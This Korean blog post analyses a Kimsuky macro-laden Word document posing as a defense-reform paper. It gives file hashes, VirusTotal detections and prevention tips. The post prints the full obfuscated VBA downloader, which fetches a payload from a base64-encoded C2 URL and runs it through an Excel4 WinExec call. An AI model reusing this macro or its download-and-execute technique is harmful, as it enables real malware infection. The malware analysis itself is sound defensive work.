꿈을꾸는 파랑새

반응형

오늘은 특정 논문을 이용한 악성코드가 삽입된 워드 문서로 위장하는 악성 워드입니다. 먼저 북한에서 해커 조직이라고 하면 김수키(Kimsuky=탈륨(Thallium),라자루스(Lazarus)가 있습니다.
APT 조직이 지난 2017년 시스코 탈로스를 통해 알려진 코니 조직과 같은 C2 인프라 이용을 해서 가상 화폐를 훔치는 수법을 사용하고 있으면 김수키(Kimsuky=탈륨(Thallium)은 지난 2015년 도에서는 한수원 자료 유출한 원전 반대 그룹 이름으로 2015년 12월 25일에는 한국 원자력 발전소(핵발전소)를 파괴를 하겠다고 했던 그룹입니다. 지금도 꾸준히 한국의 특정 정치 단체, 특정 단체,피싱 같은 걸로 개인정보를 수집하고 있습니다. 해당 내부에서는 악의적으로 만든 악성 매크로 존재를 하고 있습니다.
해쉬값은 다음과 같습니다.
MD5:5eb09dd7aafdd5af5a8396497f99e0e7
SHA-1:ea48d2e4fb846e50e7737b932c1c0c93c504b543
SHA-256:37e0d8519389f35a04c667fa79ab170df86b887557fecfc81dde7ff0b77da729 
문제는 실제 논문의 내용을 포함하고 있다는 것입니다. 즉 현재 존재를 하는 논문을 그대로 일부를 뺏겨서 만들어 놓은 악성코드라고 생각이 됩니다. 일단 내부 모습은 다음과 같이 생겼습니다.

국방개혁의 방향.doc 위장한 악성코드 실행 화면
국방개혁의 방향.doc 위장한 악성코드 실행 화면

제목과 내용을 읽어 보면 한국의 안보를 담당하시는 분들을 공격하기 위해서 만들어진 악성코드가 아닐까? 생각이 됩니다.
경영혁신이론으로 본 국방개혁의 방향.doc 워드 파일에 존재하는 매크로를 통해서 매크로를 열어 보면 다음과 같습니다.

국방개혁의 방향.doc 위장한 악성코드 매크로 악성코드
국방개혁의 방향.doc 위장한 악성코드 매크로 악성코드

Function ujmikl()
 On Error Resume Next
If (qazwsx = 0) Then
    
       On Error Resume Next


        Dim fhjk As String
        Dim aksjdfhashdf As String
        Dim fgjtgksdfhw As String
          
        
        
        ini = ughjesrh56hdsf(26) & "\de" & "sk" & "to" & "p.ini"
        
        Set wob = CreateObject("wscript.shell")
        drl = sfjksfdgasdfhefgh("aHR0cDovL240MDI4Y2h1Lm15d2ViY29tbXVuaXR5Lm9yZy9kLnBocA==")
        Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
        WinHttpReq.Open "GET", drl, False
        WinHttpReq.send
        
        If WinHttpReq.Status = 200 Then
            gjhmksfghsdfgs ini, sfjksfdgasdfhefgh(WinHttpReq.responseText)
            
            
            Set ExcelApp = CreateObject("Excel.Application")
            str9 = sfjksfdgasdfhefgh("Y2FsbCgia2VybmVsMzIiLCAiV2luRXhlYyIsICJKRkoiLCAid3NjcmlwdCAvL2U6dmJzY3JpcHQgLy9iICIi")
            str11 = sfjksfdgasdfhefgh("IiIiLCA1KQ")
            str11 = Left$(str11, InStr(str11, vbNullChar) - 1)
            ini = Replace(ini, "\", "\\")
            cmd = str9 + ini + str11
            api = ExcelApp.ExecuteExcel4Macro(cmd)
            Sleep 2000
            DeleteFileA ini
        End If
        qazwsx = 1
End If
   
End Function

으로 구성이 되어져 있는데 여기서 base64로 인코딩이 된 C2 주소가 보입니다. 해당 base64를 notepad++ 에 있는 MIME Tools를 통해서 BASE64를 변경을 하면 다음과 같은 결과를 확인할 수가 있습니다.
aHR0cDovL240MDI4Y2h1Lm15d2ViY29tbXVuaXR5Lm9yZy9kLnBocA==->http://n4028chu.mywebcommunity(.)org/d.php
로 접속을 해서 %APPDATA%\desktop.ini 파일에 저장 및 실행을 하는 것이 특징입니다. 2021-10-18 06:57:57 UTC 기준으로 바이러스 토탈에서 탐지를 하는 보안 업체 들은 다음과 같습니다.

국방개혁의 방향.doc 위장한 악성코드 안랩 V3 탐지
국방개혁의 방향.doc 위장한 악성코드 안랩 V3 탐지

Ad-Aware:VBA:Amphitryon.4019
AhnLab-V3:Downloader/DOC.Agent
Alibaba:TrojanDownloader:VBA/Obfuscation.A
ALYac:Trojan.Downloader.DOC.Gen
Antiy-AVL:Trojan/Generic.ASMacro.2D4A3
Arcabit:VBA:Amphitryon.DFB3
Avast:Script:SNH-gen [Trj]
AVG:Script:SNH-gen [Trj]
Avira (no cloud):W97M/Agent.bsq
BitDefender:VBA:Amphitryon.4019
Cynet:Malicious (score: 99)
Cyren:Trojan.NWHA-5
Elastic:Malicious (high Confidence)
Emsisoft:VBA:Amphitryon.4019 (B)
eScan:VBA:Amphitryon.4019
ESET-NOD32:VBA/Kimsuky.C
FireEye:VBA:Amphitryon.4019
Fortinet:VBA/Amphitryon.4019!tr
GData:VBA:Amphitryon.4019
Ikarus:VBA.Amphitryon

마이크로소프트 오피스 매크로 설정
마이크로소프트 오피스 매크로 설정

Kaspersky:HEUR:Trojan.MSOffice.SAgent.gen
Lionic:Trojan.MSWord.Amphitryon.4!c
MAX:Malware (ai Score=100)
McAfee:RDN/GenericOLE
McAfee-GW-Edition:BehavesLike.Downloader.cc
NANO-Antivirus:Trojan.Ole2.Vbs-heuristic.druvzi
SentinelOne (Static ML):Static AI - Malicious OPENXML
Symantec:Trojan.Gen.NPE
TACHYON:Suspicious/WOX.Obfus.Gen.8
Tencent:Heur.Macro.Generic.g.a7bb4337
ViRobot:W97M.S.Agent.196551

매크로 보안
매크로 보안

이며 안랩의 V3에서는 Downloader/DOC.Agent으로 잘 탐지 하고 삭제를 하고 있습니다. 일단 기본적으로 이런 악성코드에 감염되지 않으려면 기본적으로 백신 프로그램을 설치하고 기본적으로 마이크로소프트 워드, 리브레 오피스 등에서는 매크로 설정이 사용 안 함으로 돼 있습니다. 해당 기능은 가능한 사용을 자체를 하고 앞서 이야기한 것처럼 AV-TEST를 보고 나름 이름 있는 백신을 구매해서 실시간 업데이트,실시간 감시 기능은 항상 켜 놓고 사용을 하고 의심스러운 파일을 열지 않는 것이 좋은 방법일 것입니다.

반응형
그리드형

댓글

비밀글모드

  1. 오..저런방법도가능하군요 분석이 대단하십니다. 저도 배우고싶어요
    2021.10.22 00:28 신고
    • 매크로 악용한 악성코드 들은 나오고 있었고 그때부터 매크로는대부분 저렇게 옵션으로 설정 된것 입니다.
      2021.10.22 05:24 신고